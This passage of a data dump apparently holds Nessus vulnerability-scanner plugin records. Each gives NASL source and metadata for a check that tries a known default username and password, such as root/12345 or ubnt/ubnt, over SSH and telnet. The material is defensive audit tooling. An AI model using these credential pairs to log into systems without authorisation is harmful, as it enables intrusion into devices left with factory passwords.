Inc.\");\n\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\", \"telnetserver_detect_type_nd_version.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22, \"Services/ftp\", 21);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"ftp_func.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif ( ! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n{\n port = get_ftp_port(default: 21);\n banner = get_ftp_banner(port:port);\n if ( !banner ) audit(AUDIT_NO_BANNER, port);\n if (\"glftp\" >!< banner )\n exit(0, \"The remote FTP server on port \"+port+\" is not glftp.\");\n}\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:07:33", "description": "The account 'root' on the remote host has the default password '12345'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password '12345' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_12345.NASL", "href": "https://www.tenable.com/plugins/nessus/94379", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"12345\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94379);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '12345' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'12345'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:07:00", "description": "The account 'admin' on the remote host has the default password 'meinsm'. A remote attacker can exploit this issue to gain administrative access to the affected system..", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'meinsm' for 'admin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_MEINSM.NASL", "href": "https://www.tenable.com/plugins/nessus/94369", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"meinsm\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94369);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'meinsm' for 'admin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the default password\n'meinsm'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system..\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:22:14", "description": "The account 'root' on the remote host has the password 'artica'. An attacker may leverage this issue to gain total control of the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2010-10-25T00:00:00", "type": "nessus", "title": "Default Password (artica) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_ARTICA.NASL", "href": "https://www.tenable.com/plugins/nessus/50322", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"artica\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50322);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (artica) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An account on the remote host uses a known password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'artica'. An \nattacker may leverage this issue to gain total control of the affected \nsystem.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:06:29", "description": "The account 'admin' on the remote host has the default password 'pass'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'pass' for 'admin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_PASS.NASL", "href": "https://www.tenable.com/plugins/nessus/94370", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"pass\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94370);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'pass' for 'admin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the default password\n'pass'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:26", "description": "The account 'root' on the remote host has the default password '7ujMko0admin'. A remote attacker can exploit this issue to gain administrative access to the affected system..", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password '7ujMko0admin' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_7UJMKO0ADMIN.NASL", "href": "https://www.tenable.com/plugins/nessus/94383", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"7ujMko0admin\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94383);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '7ujMko0admin' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'7ujMko0admin'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system..\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:48:52", "description": "The account 'root' on the remote host has the password 'arcsight'. \n\nAn attacker may leverage this issue to gain total control of the affected system.\n\nNote that some network devices are known to use these credentials by default.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-08-05T00:00:00", "type": "nessus", "title": "Default Password (arcsight) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:hp:arcsight_logger"], "id": "ACCOUNT_ROOT_ARCSIGHT.NASL", "href": "https://www.tenable.com/plugins/nessus/69443", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"arcsight\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69443);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (arcsight) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An account on the remote host uses a known default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'arcsight'. \n\nAn attacker may leverage this issue to gain total control of the\naffected system.\n\nNote that some network devices are known to use these credentials by\ndefault.\");\n # http://www8.hp.com/us/en/software-solutions/software.html?compURI=1314386#.UfvZaWQ6VX8\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ee89d059\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:arcsight_logger\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:08:00", "description": "The account 'ubnt' on the remote host has the default password 'ubnt'.\nA remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'ubnt' for 'ubnt' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_UBNT_UBNT.NASL", "href": "https://www.tenable.com/plugins/nessus/94407", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"ubnt\";\npassword = \"ubnt\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94407);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'ubnt' for 'ubnt' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'ubnt' on the remote host has the default password 'ubnt'.\nA remote attacker can exploit this issue to gain administrative access\nto the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, 